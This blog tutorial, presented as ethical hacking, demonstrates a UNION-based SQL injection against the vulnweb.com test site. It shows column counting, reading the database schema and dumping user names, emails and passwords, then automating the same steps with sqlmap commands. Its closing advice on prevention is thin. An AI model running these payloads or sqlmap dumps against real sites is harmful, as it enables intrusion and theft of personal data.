top of page
Programming

How to perform a basic SQL Injection Attack? — Ethical Hacking


How does a SQL Injection attack work?

SQL injection attack is possible when a website exposes inputs to be taken from the user and uses the user input to directly run a query in MySQL. In this blog, I will be demonstrating how to perform a basic SQL Injection Attack on a website, and at the end, I will talk about a tool SQLmap , which automates the entire process.

If you don’t know what SQL Injection Attack is, you can visit this link. https://www.w3schools.com/sql/sql_injection.asp

There’s a website http://testphp.vulnweb.com/listproducts.php?cat=1 which is open for testing php vulnerablities. I will be using this website to perform SQLi attack.


1. Discovering if the website is vulnerable to SQL Injection attacks

The most basic and simple way is to check the URLs of pages you are visiting. If the URL is something of the form http://testphp.vulnweb.com/listproducts.php?cat=1, it is a potential target. To check if the webpage is actually using a SQL backend, you can append \ or a single inverted quote at the end of URL and see if anything in the page breaks or you get an SQL error. For most cases the error is something like this:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''a\'' at line 1

But the error can be anything else as well. For the website http://testphp.vulnweb.com/listproducts.php?cat=1 appending ‘ gives me the following screen


So I have established that SQL injection attack is possible on my target http://testphp.vulnweb.com/listproducts.php?cat=1


In the backend, the application might be running a query similar to

SELECT * FROM XYZ_TABLE WHERE CAT='<the value of id>'

The query executed for http://testphp.vulnweb.com/listproducts.php?cat=1 would be

SELECT * FROM XYZ_TABLE WHERE CAT=1'

And you guessed it right. This will throw an error.

The silver lining to this is now we know we can modify the query in any way we would like to. If I add --+ to the end, the query should run without errors. ( --+ or # will basically comment on anything written after it.This is a handy knowledge, though it may not be useful in this case)


2. Finding out the Databases present

The next step would be to find out the databases present. We make use of the ORDER BY clause here. If I run http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5, the corresponding MySQL query would be

SELECT * FROM XYZ_TABLE WHERE CAT=1 order by 5--+'

This will sort the results on the basis of the 5th column

I will repeat this process for different values of column numbers until I get a column number for which the page breaks. for eg. in this case when ORDER BY 12, the page breaks. I now know that the total number of columns is 11. Since the number of columns is 11, I will run a query select all 1,2,3,4,5,6,7,8,9,10,11.

The corresponding MySQL query would look like

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,2,3,4,5,6,7,8,9,10,11

Now navigate the webpage. In some places, you will find some of the numbers between 1 to 11. I see the numbers 7, 2 and 9.

I now know that anything I write in the place of 7, 2 and 9 will be visible. I want to kow the current database, user and version , so I execute

Note: %20 is ASCII for space

I replaced 2 with user(), 7 with database() and 9 with version() .

I will get to know the datatbase, database version and the user details.

I get the following information:

  1. database — acuart

  2. user — acuart@localhost

  3. version — 8.0.22–0ubuntu0.20.04.2


3. Discovering tables and table data in the current database

Once the above information is gathered, everything is going to be very simple. To get the list of tables, I will just run

Corresponding SQL Query:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema = 'acuart'

information_schema is the default database which contains list of tables. We used this information to find out the table names. acuart is the database name we got from the previous step.

The webpage would look like:

We got a list of tables:

  1. artists

  2. carts

  3. categ

  4. featured

  5. guestbook

  6. pictures

  7. products

  8. users

4. Discovering column names in a table

Discovering columns of the table users


Corresponding SQL Query:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name = 'users'

I get the column names as :

  1. uname

  2. pass

  3. cc

  4. address

  5. email

  6. name

  7. phone


5. Discovering data stored in a table

To view name, email, password of users :

Corresponding SQL Query:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,name,3,4,5,6,email,8,pass,10,11 from users


6. Using SQLmap to do the above easily

If I wanted to use sqlmap to do the above, I would have to write the run the following commands on my terminal

  1. sqlmap -u “https//testphp.vulnweb.com/listproducts.php?cat=1" --dbs to get list of databases

  1. sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db : get current database

  1. sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart : get list of tables in ‘acuart’

  1. sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1" --columns -T users -D acuart : get columns in the table ‘users’

  1. sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1" -T users -D acuart --dump : store all the data in the table users


Summarising SQL Injection Attacks

SQL Injection attack is one of the most powerful attacks a hacker can perform. There are many ways SQL injection attacks can be prevented like blacklisting or whitelisting certain input characters. Programming frameworks also provide interfaces that allow inputs for only certain fields.


This blog was originally published in the personal blog website of Gourav : https://gourav-dhar.com
0 comments

Comments


Related Articles

Categories

Let's Get
Social

  • alt.text.label.Twitter
  • alt.text.label.LinkedIn
  • 25231
Subscribe to our NewsLetter

Join our mailing list to get a notification whenever a new blog is published. Don't worry we will not spam you.

bottom of page